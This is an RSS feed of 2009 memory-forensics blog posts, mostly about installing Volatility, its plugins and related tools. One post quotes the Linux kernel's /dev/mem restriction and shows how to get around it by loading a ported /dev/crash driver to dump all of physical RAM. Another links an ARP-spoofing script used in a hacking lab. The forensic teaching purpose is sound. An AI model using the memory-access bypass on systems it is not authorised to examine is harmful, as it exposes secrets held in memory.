<item><title>More Misc Stuff</title><description>Secuobs.com : 2009-12-20 03:27:02 - JL's stuff - I recently came across a couple of tools that may be helpful to someone, and I have created a repository for some of my stuff. Maatkit: Maatkit has a lot of cool utilities that allow you greater control of MySQL. I recently found it very useful for importing an extremely large MySQL dump by using mk-parallel-restore. For information about its features, either visit the website or check out this Linux Magazine article. HTMLDOC: HTMLDOC allows you to create PDF documents of html pages. You can convert pages one page at a time, or as a book. So you could use wget to download the pages of a website recursively, including the graphics, and then pdf'ify it into one book with references; pretty useful. Some of my stuff: Since I'm not sure how much longer I will have my academic website, I am starting to move some of the code that's been hosted there to another location. I have also added a few things that are not listed on the old code page or elsewhere on my academic site, such as a DC3 Image Assembler script that worked with the last DC3 challenge (haven't looked at the current one) and a Virus Total hash checker that takes a list of hashes and posts them to Virus Total to build an html report. This last one needs some modification, however, since if one is checking lots of files Virus Total starts to report errors. Hopefully I'll have some time to create a new version in the future.</description><link>http://www.secuobs.com/revue/news/174339.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/174339.shtml</guid></item>
<item><title>Misc Stuff</title><description>Secuobs.com : 2009-12-13 17:53:52 - JL's stuff - Droid Forensics: For those of you interested in Droid forensics, check out the viaForensics website. There you can find a presentation on Droid forensics (pdf) as well as a regularly updated blog. New Volatility Plugins: MHL has been busy creating new Volatility plugins. He's modified the malfind plugin to use YARA, which allows one to search the process memory for defined patterns (rules). He also has created a new plugin called ldr_modules.py that can detect unlinked LDR_MODULE entries. I suggest reading his blogpost in order to take it all in. You can get the updated plugins here (zip). Also from his blogpost you'll see that AAron and Moyix rocked the Incident Detection Summit. MDD will cease to exist: It seems that development and maintenance of the MDD tool will cease. For those of you who are dependent on that tool, windd is a great free alternative. Into the Boxes: For those of you who might not be aware, there is a new quarterly digital forensic and incident response ezine that is about to come out next month called Into the Boxes. For more updates, check out their twitter feed. If you are interested in contributing to future publications, you can find the guidelines here.</description><link>http://www.secuobs.com/revue/news/171468.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/171468.shtml</guid></item>
<item><title>Briefly: New VDP Mac OSX Document</title><description>Secuobs.com : 2009-11-08 17:04:21 - JL's stuff - We have received a new submission to the VDP. Keep them coming :-) Dougee has submitted an install manual for Snow Leopard. It covers installation from the official tar ball release as well as from the SVN repository. It also covers installing some of the plugin dependencies. Shouts to Dougee!</description><link>http://www.secuobs.com/revue/news/158694.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/158694.shtml</guid></item>
<item><title>OT: RSS Feeds and things</title><description>Secuobs.com : 2009-11-06 22:42:42 - JL's stuff - This is not going to be my usual banter, just something I came across (yeah, I know, I'm late) and thought was cool. So it's no big secret that I use Google's Reader to keep up with all of my RSS feeds. I had noticed that we are now able to search for shared items and hadn't really given it much thought. I had even shared a couple of articles earlier in the year, but didn't really know what happened to them, or forgot that I had done so. Anyway, the other day people on twitter were talking about Google Dashboard and I decided to check it out. There really wasn't that much surprising until I looked under the "Reader" section and saw I had followers. Followers? For my Google reader? I wanted to know what they were following. So after some investigation I find my shared items feed with the two things I had shared previously. I've since decided to add things to the feeder, sometimes even with notes :-) I know Google's got the goods on me and I'm feeding the monster, black helicopters etc. etc. etc., but it's still a cool way to share things you read. I've since subscribed to a few feeds myself :-)</description><link>http://www.secuobs.com/revue/news/158358.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/158358.shtml</guid></item>
<item><title>Briefly: New Volatility Release</title><description>Secuobs.com : 2009-10-26 05:39:32 - JL's stuff - (via Echo6) There is a new stable release of Volatility v1.3.2 available for download. Also, Michael Cohen (scudette) and Mike Auty have been extremely busy developing. Their fearless efforts could use some eyes to track down and report bugs, however. If you feel like helping out, download the 1.3.2 version, test it out and report any bugs you may find. You may report bugs using the Issues feature on the Google Code site. You may also reach Mike Auty at mike (dot) auty (at) gmail (dot) com. And of course you can always reach the Volatility team on IRC on the #volatility channel at irc.freenode.net. Mike Auty (ikelos) and Michael Cohen (scudette) are often online, so you can talk to them about any bugs you encounter directly.</description><link>http://www.secuobs.com/revue/news/153922.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/153922.shtml</guid></item>
<item><title>Volatility Get Plugins Bash Script</title><description>Secuobs.com : 2009-10-22 04:52:33 - JL's stuff - Earlier I had written about all of the known Volatility plugins and how to go about installing them. Now I've decided to make things even easier for some, by including a bash script that will download and install all of these plugins. It will also install pefile, pycrypto and pydasm. I have tested it on a Linux box as well as a Cygwin installation. Make sure you are running this as root (or with sudo) if you are doing this under Linux. Also make sure you have subversion installed. Prereqs for Cygwin: Obviously you must have Cygwin installed. In addition to what I have listed in a previous post, you will also need to install: wget, unzip, svn (subversion). Hopefully I haven't forgotten anything; let me know if I have. Simply unzip the bash script into the directory where you want Volatility installed. Then run the script: ./get_plugins.bsh. This bash script removes one of the example files (memory_plugins/example3.py) since it has a conflicting _EPROCESS definition, so if you want that file, simply comment out that remove statement. You will have to install Inline::Python yourself until I figure out a way to get it installed in a general fashion. Let me know if you encounter errors.</description><link>http://www.secuobs.com/revue/news/152821.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/152821.shtml</guid></item>
<item><title>Briefly: VDP Wiki</title><description>Secuobs.com : 2009-10-20 21:35:23 - JL's stuff - I have updated the VDP Wiki to include some blog posts out there about using or installing Volatility. There are also links to Richard McQuown's recent blogposts on his Volatility Batch File Maker and walk through. There are also links to other submitted articles on installation, usage and reporting. I'll continue updating the Wiki as I find other articles to add to it. If anyone wants to add something new, let me know: jamie (dot) levy (at) gmail (dot) com</description><link>http://www.secuobs.com/revue/news/152312.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/152312.shtml</guid></item>
<item><title>Briefly: OMFW 2010</title><description>Secuobs.com : 2009-10-10 02:47:21 - JL's stuff - Open Memory Forensics Workshop (OMFW) 2010 is currently being planned. If you are interested in presenting or helping out, let them know.</description><link>http://www.secuobs.com/revue/news/149178.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/149178.shtml</guid></item>
<item><title>Briefly: Malware Marketing talk at John Jay College</title><description>Secuobs.com : 2009-10-09 21:57:12 - JL's stuff - There's an upcoming talk at John Jay College next week that may interest some of you in the NYC area: "Understanding the Market for Malware and Cybercrime", Thursday, Oct. 15, 2009, 3:15 pm, room 630T. Tom Holt, Assistant Professor, School of Criminal Justice, Michigan State University. Events will take place at John Jay College of Criminal Justice, 899 Tenth Avenue (between 58th and 59th Streets). RSVP to Nicole Daniels (ndaniels@jjay.cuny.edu, 212-237-8920).</description><link>http://www.secuobs.com/revue/news/149117.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/149117.shtml</guid></item>
<item><title>/dev/crash Driver</title><description>Secuobs.com : 2009-08-25 00:23:08 - JL's stuff - As you may or may not know, some distributions (RHEL, Fedora, Ubuntu) block some reads and writes to /dev/mem, and have for some time. I first came across this when writing my thesis at John Jay College. Since I was trying to test the memory encryption library I had written and the original tests comprised scanning all of memory, the /dev/mem barrier was a bit cumbersome. I had gotten around it by using a Python script called Zeppoo-dump.py (project no longer maintained) to overwrite the offending instructions. The following code only allows access within the first 256 pages of memory (/usr/src/linux/drivers/char/mem.c):
#ifdef CONFIG_STRICT_DEVMEM
static inline int range_is_allowed(unsigned long pfn, unsigned long size)
{
	u64 from = ((u64)pfn) &lt;&lt; PAGE_SHIFT;
	u64 to = from + size;
	u64 cursor = from;

	while (cursor &lt; to) {
		if (!devmem_is_allowed(pfn)) {
			printk(KERN_INFO
		"Program %s tried to access /dev/mem between %Lx->%Lx.\n",
				current->comm, from, to);
			return 0;
		}
		cursor += PAGE_SIZE;
		pfn++;
	}
	return 1;
}
#else
static inline int range_is_allowed(unsigned long pfn, unsigned long size)
{
	return 1;
}
#endif
and from /usr/src/linux/arch/x86/mm/init_32.c:
int devmem_is_allowed(unsigned long pagenr)
{
	if (pagenr &lt;= 256)
		return 1;
	if (!page_is_ram(pagenr))
		return 1;
	return 0;
}
So there has to be a way around this, right? Checking the Redhat Crash Utility listserv yielded some good advice. There are three courses of action proposed: (1) Rebuild your kernel without the CONFIG_STRICT_DEVMEM restriction; (2) Port the Fedora /dev/crash driver (drivers/char/crash.c) to your kernel; (3) Write a kretprobe module that tinkers with the return value of the kernel's devmem_is_allowed() function such that it always returns 1. I don't want to recompile the kernel since I'll lose whatever is currently in memory, so I'll focus on (2). Since I am currently using Ubuntu instead of Fedora, I knew I would have to port the code over. So I found a copy of crash.c and crash.h and set to work. You can find the ported crash driver here as well as a Makefile. Now, I take NO responsibility for what may happen to your machine if something goes wrong during installation. This is for a 32-bit system, and I have only tested this on Ubuntu Ibex kernel 2.6.27-14-generic. I still need to do some testing and will probably have more to say about that later. That being said, we'll continue. Grab the tar file from above and extract:
$ tar -xvzf crash_driver_ubuntu.tgz
crash_driver/
crash_driver/crash.h
crash_driver/Makefile
crash_driver/crash.c
Go inside the newly created folder and compile the kernel module:
$ cd crash_driver
$ ls
crash.c  crash.h  Makefile
$ make
make -C /lib/modules/2.6.27-14-generic/build M=/home/levy/crash/crash_driver modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.27-14-generic'
  CC [M]  /home/levy/crash/crash_driver/crash.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/levy/crash/crash_driver/crash.mod.o
  LD [M]  /home/levy/crash/crash_driver/crash.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.27-14-generic'
At this point you should have the following files:
$ ls
crash.c  crash.h  crash.ko  crash.mod.c  crash.mod.o  crash.o  Makefile  Module.markers  modules.order  Module.symvers
The file of interest is the crash.ko kernel module. We will load this into the kernel and check that it is installed correctly:
# insmod crash.ko
# lsmod | grep crash
crash                  10368  0
# ls -l /dev/crash
crw-rw---- 1 root root 10, 59 2009-08-24 15:04 /dev/crash
# tail -n 1 /var/log/messages
Aug 23 15:04:10 [comp name] kernel: [19030.855920] crash memory driver: version 1.0
So now we have a new device we can use to access memory (/dev/crash):
# dd if=/dev/crash of=crash.dd
dd: reading `/dev/crash': Bad address
6812680+0 records in
6812680+0 records out
3488092160 bytes (3.5 GB) copied, 15.7964 s, 221 MB/s
I'm not yet sure what the "Bad address" error means, but I suspect it is because dd tried to read beyond the 3.3 GB of memory that I have available. You can remove the crash.ko module like so when you are finished:
# rmmod crash
Now let's test the newly obtained memory dump to see if it works. I'm going to use the RH Crash Utility with the volatile patch, which you can find here:
$ crash -f /boot/System.map-2.6.27-14-generic /usr/src/linux-source-2.6.27/vmlinux crash.dd --volatile

crash 4.0-8.9
Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009  Red Hat, Inc.
Copyright (C) 2004, 2005, 2006  IBM Corporation
Copyright (C) 1999-2006  Hewlett-Packard Co
Copyright (C) 2005, 2006  Fujitsu Limited
Copyright (C) 2006, 2007  VA Linux Systems Japan K.K.
Copyright (C) 2005  NEC Corporation
Copyright (C) 1999, 2002, 2007  Silicon Graphics, Inc.
Copyright (C) 1999, 2000, 2001, 2002  Mission Critical Linux, Inc.
This program is free software, covered by the GNU General Public License,
and you are welcome to change it and/or distribute copies of it under
certain conditions.  Enter "help copying" to see the conditions.
This program has absolutely no warranty.  Enter "help warranty" for details.

GNU gdb 6.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...

      SYSTEM MAP: /boot/System.map-2.6.27-14-generic
    DEBUG KERNEL: /usr/src/linux-source-2.6.27/vmlinux (2.6.27.18)
        DUMPFILE: crash.dd
            CPUS: 2
            DATE: Mon Aug 23 12:31:54 2009
          UPTIME: 02:44:55
    LOAD AVERAGE: 0.10, 0.17, 0.17
           TASKS: 252
        NODENAME: --
         RELEASE: 2.6.27-14-generic
         VERSION: #1 SMP Tue Aug 18 16:25:45 UTC 2009
         MACHINE: i686  (1994 Mhz)
          MEMORY: 3.2 GB
             PID: 0
         COMMAND: "swapper"
            TASK: c0471340  (1 of 2)  [THREAD_INFO: c04aa000]
             CPU: 0
           STATE: TASK_RUNNING
crash>
So far so good :-)
crash> ps
   PID    PPID  CPU   TASK    ST  %MEM     VSZ    RSS  COMM
      0      0   0  c0471340  RU   0.0       0      0  [swapper]
      0      0   1  f744e480  RU   0.0       0      0  [swapper]
      1      0   0  f7448000  IN   0.1    3056   1900  init
      2      0   1  f7448c90  IN   0.0       0      0  [kthreadd]
      3      2   0  f7449920  IN   0.0       0      0  [migration/0]
      4      2   0  f744a5b0  IN   0.0       0      0  [ksoftirqd/0]
      5      2   0  f744b240  IN   0.0       0      0  [watchdog/0]
      6      2   1  f744bed0  IN   0.0       0      0  [migration/1]
      7      2   1  f744cb60  IN   0.0       0      0  [ksoftirqd/1]
      8      2   1  f744d7f0  IN   0.0       0      0  [watchdog/1]
      9      2   0  f744f110  IN   0.0       0      0  [events/0]
     10      2   1  f7460000  IN   0.0       0      0  [events/1]
     11      2   0  f7460c90  IN   0.0       0      0  [khelper]
[snip]
crash> foreach files
PID: 0      TASK: c0471340  CPU: 0   COMMAND: "swapper"
ROOT: /    CWD: /
No open files

PID: 0      TASK: f744e480  CPU: 1   COMMAND: "swapper"
ROOT: /    CWD: /
No open files

PID: 1      TASK: f7448000  CPU: 0   COMMAND: "init"
ROOT: /    CWD: /
 FD    FILE     DENTRY    INODE    TYPE  PATH
  0  f69c8300  f700c550  f695a3e0  CHR   /dev/console
  1  f69c8300  f700c550  f695a3e0  CHR   /dev/console
  2  f69c8300  f700c550  f695a3e0  CHR   /dev/console
  3  f69c8f00  f720d770  f7243c38  FIFO
  4  f69c8780  f720d770  f7243c38  FIFO
  5  f69c86c0  f7218990  f7045228  SOCK
  6  f69c8b40  f70216e8  f70b6000  DIR   inotify

PID: 2      TASK: f7448c90  CPU: 1   COMMAND: "kthreadd"
ROOT: /    CWD: /
No open files

PID: 3      TASK: f7449920  CPU: 0   COMMAND: "migration/0"
[snip]
crash> foreach net
foreach: WARNING: net command requires -s or -S option

PID: 0      TASK: c0471340  CPU: 0   COMMAND: "swapper"
No open sockets

PID: 0      TASK: f744e480  CPU: 1   COMMAND: "swapper"
No open sockets

PID: 1      TASK: f7448000  CPU: 0   COMMAND: "init"
FD   SOCKET    SOCK     FAMILY:TYPE   SOURCE-PORT  DESTINATION-PORT
 5  f7045200  f6bfe380  UNIX:DGRAM
[snip]
In order to compile the kernel so that you can use the RedHat Crash Utility, you can follow the Ubuntu tutorial. After installing the appropriate packages you may have to run the following command: sudo apt-get build-dep linux. You should end up with a linux-source tar.bz2 file under /usr/src. You should also have at least one folder with the kernel headers for your current kernel. You can extract the tar.bz2 file as so:
$ tar -xjf linux-source.tar.bz2
Go into the resulting folder and set the following flag in the Makefile: CFLAGS_KERNEL = -g. Copy the config file from your /usr/src/linux-headers-`uname -r` folder into the /usr/src/linux-source-`uname -r` folder. Now type make. After the kernel is finished compiling, you should end up with a vmlinux file. This is the file with the kernel debugging information that you need in order to run the RH crash utility. For more information on the RH Crash Utility, check out: the Official RH Crash Utility Website; Linux Memory Forensics by A. Walters, M. Cohen and D. Collett (slides from CEIC).</description><link>http://www.secuobs.com/revue/news/133821.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/133821.shtml</guid></item>
<item><title>Briefly: VDP Project</title><description>Secuobs.com : 2009-08-21 07:15:22 - JL's stuff - I have volunteered to help with the Volatility Documentation Project (VDP) for Volatility. If you have something you would like to contribute, please feel free to email me at jamie - dot - levy - at - gmail - dot - com. Contributed documents will appear on the Volatility Google Code website. We have two new contributions by SAL: VolReport (win) with an accompanying batch script, as well as a manual covering the visual capabilities of Volatility. Keep them coming :-)</description><link>http://www.secuobs.com/revue/news/133052.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/133052.shtml</guid></item>
<item><title>Installing Volatility Plugins</title><description>Secuobs.com : 2009-08-12 23:43:45 - JL's stuff - So you've already installed Volatility using SVN and you want to try out some of the community plugins that people are raving about. Publicly known plugins are listed on the forensics wiki. The wiki contains links to plugins as well as links to blogposts/articles for further information on installation, dependencies and how they work. Most plugin installation is straightforward, where one may simply place the plugin in the memory_plugins directory within the Volatility directory. Some are only slightly more complicated by needing a helper library installed in addition to the plugin itself. Therefore we have three cases for plugin installation (please visit the forensics wiki for more information):
1. Simple Case - only in memory_plugins: volshell, IDT, cryptoscan, orphan_threads, keyboardbuffer, getsids, moddump, objtypescan, symlinkobjscan, driverscan, fileobjscan, pstree
2. More Complex Case - also supporting file(s): driverirp (needs driverscan), threadqueues (needs listspy), ssdt (needs listspy)
3. Most Complex Case - installation of supporting libraries: malfind (needs pydasm and pefile), kernel_hooks (needs pefile), usermode_hooks (needs pefile), volreg (needs pycrypto), VolRip (needs volreg and Inline::Python)
Simple installation of volshell: For an example of a simple installation, we will install the volshell plugin. Simply download the volshell.py file and place it into your memory_plugins directory. You can test to make sure that it is installed correctly by running Volatility without any arguments, and volshell should appear under "Supported Plugin Commands" (highlighted below in Figure 1). All other "simple case" plugins should install the same way. Figure 1: Installation of volshell. More Complex Cases: The ssdt and threadqueues plugins require that the listspy library file be placed in the forensics/win32 directory in addition to placing the ssdt.py and threadqueues.py into the memory_plugins folder as before. The driverirp plugin requires the driverscan plugin in order to work. Both of these plugins are placed in the memory_plugins directory. After placing the files in the appropriate places, check to make sure that the plugins are properly installed by running volatility without any arguments as before and checking under "Supported Plugin Commands" (Figure 1). Most Complex Cases: For the "most complex cases" other libraries must be installed for the plugin to work properly. First we will look at installing the malfind plugin. First of all, download the malfind.py plugin file and place it in the memory_plugins directory. Now you must install the pydasm and pefile libraries. In order to install the pydasm library, you will have to do some initial setup, including installing a gcc compiler and make. For this tutorial, we will use MinGW. Figure 2: Sourceforge download site for MinGW. Download the windows installer for MinGW from the sourceforge website (Figure 2). Double click to install (Figures 3-9). Figure 3: Choose "Download and Install". Figure 4: Click "Agree". Figure 5: Choose "Current". Figure 6: Choose compilers and MinGW make. You do not necessarily have to install all compilers; however, for simplicity, do a full install. Figure 7: Choose location for installation. The default is fine. Figure 8: Installing. Figure 9: Installation complete. Once the installation is complete and you have clicked finish, you will have to make a few adjustments to the installation in order to get things working properly. First of all, we need to have an executable called "make.exe". The make executable for MinGW is appropriately named mingw32-make.exe. Simply copy this executable and paste it into the same directory (C:\MinGW\bin), which should result in an identical copy named "Copy of mingw32-make.exe". Rename this executable to "make.exe" as shown in Figures 10-11. Figure 10: "Copy of mingw32-make.exe". Figure 11: Rename to "make.exe". Now we have to modify our path to include the executables for MinGW. If you have a regular start menu, click on start and then right click on "My Computer" and choose properties. If you have the classic start menu, just right click on "My Computer" and choose properties. Click on the "Advanced" tab and then click on "Environment Variables". Click on the Path system variable towards the bottom of the window and click the "Edit" button. We will append the path of our MinGW installation to the end of the existing Path variable. Where it says "Variable Value", go to the end of the line and add the following (if you installed MinGW in a different location, modify appropriately): ;C:\MinGW\bin. Figure 12: Adding C:\MinGW\bin to the path variable. Now for installing pydasm. Download the source code for libdasm. The easiest way to extract the contents from this tar ball is using 7-Zip. Once you have 7-Zip installed, you can associate all zip files by starting the 7-Zip File Manager (Start > Programs > 7-Zip > 7-Zip File Manager), clicking on Tools > Options, clicking "Select all" in the System tab and then "OK" (Figure 13). Figure 13: Associating zip file types. At this point you are ready to extract the libdasm/pydasm source code. Double click the downloaded pydasm tar ball. You should see the following: Figure 14: Opening libdasm tar ball with 7-Zip. Double click on the libdasm tar file inside from within the 7-Zip application until you see a folder icon with the name libdasm-1.5 (or other version number). Figure 15: libdasm folder. Highlight the folder and then click on the extract button and say OK. The folder will extract with all source code inside to the path you choose, or by default the current directory. Figure 16: Extracting the libdasm source code. Now open a command prompt and change directories until you are in the newly extracted libdasm folder. Type the following commands:
make
cd pydasm
python setup.py build -c mingw32
python setup.py install
That's it! You've installed pydasm. Now you are ready to install the pefile library. Grab the zip file or tar ball of the source code and extract it as you did before. Go into that resulting folder and type the following:
python setup.py build
python setup.py install
Now you've installed pefile. Now you should see the malfind plugin listed under supported plugins for Volatility. All the other plugins that depend on pefile should work as well if they are installed in the memory_plugins directory. Installing the volreg plugin requires pycrypto. Simply go to the gitweb interface for this project and download the latest git snapshot by clicking on "snapshot". This will download a tar ball file of the source code. Simply extract it as you did before, then open the command prompt and change into that directory. Then type the following:
python setup.py build
python setup.py install
You've now installed the pycrypto library. Download the volreg tarfile and extract the contents into your Volatility folder by double clicking as before, selecting all three folders and changing the extraction path to your Volatility folder. All files should be placed into the correct location. Figure 17: Extraction of volreg into Volatility directory. Next time we will cover the volrip plugin, after I figure out how to get Inline::Python working under windows.</description><link>http://www.secuobs.com/revue/news/130354.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/130354.shtml</guid></item>
<item><title>Volatility SVN</title><description>Secuobs.com : 2009-08-04 06:47:15 - JL's stuff - Since the last post on Volatility, some of you may be wondering how you may download the newest source of Volatility from the Google SVN repository. Well, for Linux it's very easy. After you install subversion using yum or apt-get, you simply follow the instructions on the website:

svn checkout http://volatility.googlecode.com/svn/trunk [folder name]

where [folder name] is replaced by the name of the folder you want to contain the downloaded code.

For Windows users, it's only slightly more complicated. First you must install a subversion client. For this post we will use Tortoise SVN.

(Figure 1: Tortoise SVN website)

Go to the downloads section and choose the appropriate installer. For this post we are choosing the 32 bit version.

(Figure 2: Tortoise SVN website - downloads section)

Once you have downloaded the installer, run it. You may see the following security warning; just click Run. All defaults should be fine, so keep clicking Next until the installation finishes.

(Figures 3 and 4: Running the Tortoise SVN installer)

After the installation is complete, you will have to restart your computer. After restart you should see the following menu added when you right click:

(Figure 5: Tortoise SVN right click menu options)

Create a folder for the repository (for this run through we will create a folder called Volatility on the root of the C: drive). Right click and choose "SVN Checkout" (noted in the picture above). After choosing this menu, you should see the following:

(Figure 6: Filling in options to download Volatility)

Paste the url of the repository (http://volatility.googlecode.com/svn/trunk) in the first text box and the location of the newly created folder in the second text box (as shown above). Leave the other options the same as shown above. Press OK. You should see the following as it begins downloading and then finishes:

(Figures 7 and 8: Downloading Volatility from SVN)

The newly created folder should now contain the SVN repository. This includes another folder named "Volatility" that contains the actual source code. If you go inside the inner Volatility folder you should see the python source code files as shown in Figure 10.

(Figures 9 and 10: Newly created folder containing the Volatility SVN repository)

To test the newly downloaded code, open a command shell, go inside the Volatility folder (which is inside your newly created folder) and type "python volatility" (without the quotes). This is assuming you have already installed Python, which is covered in the installation manual (see below).

(Figure 11: Running Volatility)

Now you're set. You have the latest source code for Volatility. Next will be how to install plugins.</description><link>http://www.secuobs.com/revue/news/127706.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/127706.shtml</guid></item>
<item><title>Briefly: recordmydesktop</title><description>Secuobs.com : 2009-08-03 21:09:44 - JL's stuff - Occasionally I have needed to make screencasts for my students so that they would have something to look at in their own time. There are two tools that make this easy on Linux (both should be available in the yum or apt repositories): recordmydesktop and ffmpeg (ffmpeg.org).

Recordmydesktop does as it sounds: it records the desktop. It has options to set the size of the area to record as well as the window you would like to record. I like to choose the window option myself. I also like to record without sound, but you can figure out how to modify the script to remove that option if you so choose.

FFmpeg is a nice tool that allows you to convert, record and stream audio and video. I use it to convert the resulting video from recordmydesktop to flv format in order to upload to photobucket or elsewhere.

To make my life easier, I have created the following script that takes in 1-2 arguments. The first argument should be the desired name of the resulting video file. The second argument is an (optional) amount of time to wait before recording. The default wait time is 3 seconds. When you run the script it waits for you to click on the window that you wish to record, by using xwininfo to get the window id number. You will notice that the mouse changes to a "+" sign as it is waiting for you to click. Once you click the window, it will begin recording that window area after the appropriate wait time has transpired. The video is converted to [chosen filename].flv after you have stopped recording (CTRL-C in the terminal from which you started the script). Feel free to do with it as you please. The script can be found below:

#!/bin/bash
# Warning: this does not have robust error checking
bad=67
if [ $# -lt 1 ]
then
    echo "Usage: $0 filename [optional time]"
    exit $bad
fi
if [ $# -eq 1 ]        # check for arguments
then
    time=3             # if one (only filename) exists, sleep for 3 seconds
    filename=$1        # set filename
else
    time=$2            # else, we'll sleep for $2 seconds
    filename=$1        # set filename
fi
# xwininfo waits for a click and prints "xwininfo: Window id: 0x... (name)";
# the sed expressions strip everything but the id
recordmydesktop -windowid $(xwininfo | grep "Window id" | sed -e 's/xwininfo: Window id: //' -e 's/ .*//') -o $filename.ogv -delay $time --no-sound
ffmpeg -i $filename.ogv -b 384000 -s 640x480 -pass 1 -passlogfile log-file $filename.flv</description><link>http://www.secuobs.com/revue/news/127566.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/127566.shtml</guid></item>
<item><title>Cygwin Installation</title><description>Secuobs.com : 2009-07-31 09:54:55 - JL's stuff - Note: I am reusing a post from my forensics class at John Jay College. This will be used as a reference for an upcoming post on Volatility module installation. So be patient, there is more to come.

This post goes over an installation of Cygwin, which is a Linux-like environment for Windows. Since most of you have Windows machines, this will allow you to run tools that normally run under Linux/Unix environments. The setup file is here. When you download setup, double click it. You should see the following. Press "Next" and choose "Install from the Internet".

Choose where to install Cygwin (by default it is in C:\Cygwin).

Cygwin will create a directory in which it will store its files during installation. After installation you can delete the folder. The default location is the desktop.

Select your internet connection. The default is OK.

Select a mirror (mirrorservice.org is good).

Press "Next". You should see the following.

Next you will see a list of packages you can download. By default these are organized by category.

If you press the plus signs on the left hand side, it will open up the category and you can select specific packages.

Here is a list of packages you need, organized by category:

From the Base category:
1. Everything

From the Devel category:
1. Gcc (C, C++, Fortran compilers)
2. gcc-mingw (Mingw32 support headers and libraries for GCC)
3. gcc2 (Version XXXX, whatever is latest, of C, C++, Fortran compilers)
4. gdb (The GNU Debugger)
5. make (The GNU version of the 'make' utility)
6. mingw-runtime (MinGW Runtime)
7. openssl-devel (The OpenSSL development environment)

From the Editors category:
1. Nano (A pico clone text editor with extensions; works like pico)
2. vim (Vi Improved, enhanced vi editor)

From the Interpreters category:
1. Perl
2. Python

From the Utils category:
1. util-linux (Random collection of Linux utilities)
2. file
3. ELFIO

From the Text category:
1. less (A file pager program, similar to more)

After you have made your selections, press Next for installation to begin. This part is the actual installation, and may take some time. Just let it finish. After it finishes you will be asked if you want to create shortcuts on the desktop. Make sure to click Finish.

Running Cygwin

When you run Cygwin for the first time, it might take a little longer to start up. This is because it is configuring a few more files for your environment. Then you should get a command line prompt that looks like the following. You are now able to work on your programs at home on your Windows machines.</description><link>http://www.secuobs.com/revue/news/126848.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/126848.shtml</guid></item>
<item><title>Volatility News</title><description>Secuobs.com : 2009-07-23 05:36:36 - JL's stuff - So if you follow me or Moyix on twitter, you will have seen some updates about some cool new plugins by MHL for Volatility. Other volatility plugins are listed on the Forensics Wiki. Moyix has also released his slides from his recent talk on combining memory and registry analysis. Awesome stuff!

Volatility was also recently mentioned in Episode 522 of Hak5 ("What's in your RAM"), along with some other very cool tools like Matthieu Suiche's win32dd.

Volatility has been under heavy development lately and has issued a call for bugs. So if you are currently a user and have encountered something odd, please report it so that it may be fixed. You can do so by sending an email to the developer's listserv. In order to get the newest code updates, you can download Volatility from the svn repository by simply following the instructions on the site. For installation instructions you can check out the install manual written by yours truly :-)

BTW, Volatile Systems is also currently hiring. So if memory forensics and reverse engineering are within your interests, you can apply for a job that includes both. It's an exciting time and I'm sure there will be much more to come.</description><link>http://www.secuobs.com/revue/news/123803.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/123803.shtml</guid></item>
<item><title>NeFX 2009</title><description>Secuobs.com : 2009-06-05 20:14:06 - JL's stuff - Coming to NYC this summer:

NeFX 2009
The First Annual ACM Northeast Digital Forensics Exchange
July 20-21, 2009 @ John Jay College of Criminal Justice/CUNY, NYC

The ACM Northeast Digital Forensics Exchange (NeFX) is a workshop, sponsored in part by the National Science Foundation, to foster collaboration on digital forensics and information assurance between federal and state law enforcement, academia, and industry. Our goal is to bring together leading practitioners and academics in order to yield partnerships that advance research on digital forensic science through mutual sharing of the problems of practice and research.

This should be interesting. They have some good speakers lined up and some interesting topics for tutorials. Check the website for more details.</description><link>http://www.secuobs.com/revue/news/106341.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/106341.shtml</guid></item>
<item><title>CEIC materials</title><description>Secuobs.com : 2009-06-01 16:55:33 - JL's stuff - I would have had this up sooner, but I was out of town last week and the week before was the conference. Anyway, I promised I would post the slides and supporting files for my CEIC classes. I don't have the slides for the foreign language talk, but I didn't promise to give those out ;-)

How to Address ESI Involving Encryption from Disk Level to Individual Files (with David Lyman): ppt | pdf

Spoofing/hacking/memory analysis talk: pdf

Here is the ARP spoofing perl script we used and some of you requested: arpspoof.pl. You must install Nemesis for the script to work, or you can modify it to use another packet crafting program. Also, depending on the distro you might have to modify the path for the arp command (for Fedora it is /sbin/arp). Anyway, you should be able to modify it on your own.

The agenda had changed somewhat for the second talk, since I had taken the class over from someone else at the last second. I would like to thank Prof. Bilal Khan for all of his help and his donation of the vulnerable VM :-) This lab is representative of some of the courses in the Forensic Computing graduate program at John Jay College.

For those of you who would like more VM machines to hack into, you can go to de-ice.net. Also, we used Wireshark and Backtrack 4.

I would also like to thank AAron and Moyix from the Volatility community for their insight as well :-)</description><link>http://www.secuobs.com/revue/news/104428.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/104428.shtml</guid></item>
<item><title>Cuil Not So Cool</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - So after reading about the new search engine called Cuil, I couldn't wait to try it out. I didn't realize it had gone live until after reading about how much it failed. Most people complained about not being able to pronounce "Cuil", in spite of lots of publicity that it is pronounced "Cool", so maybe some people didn't bother to read. There were also disputes about what, if anything, Cuil returned during searching. So I decided to give it a try myself.

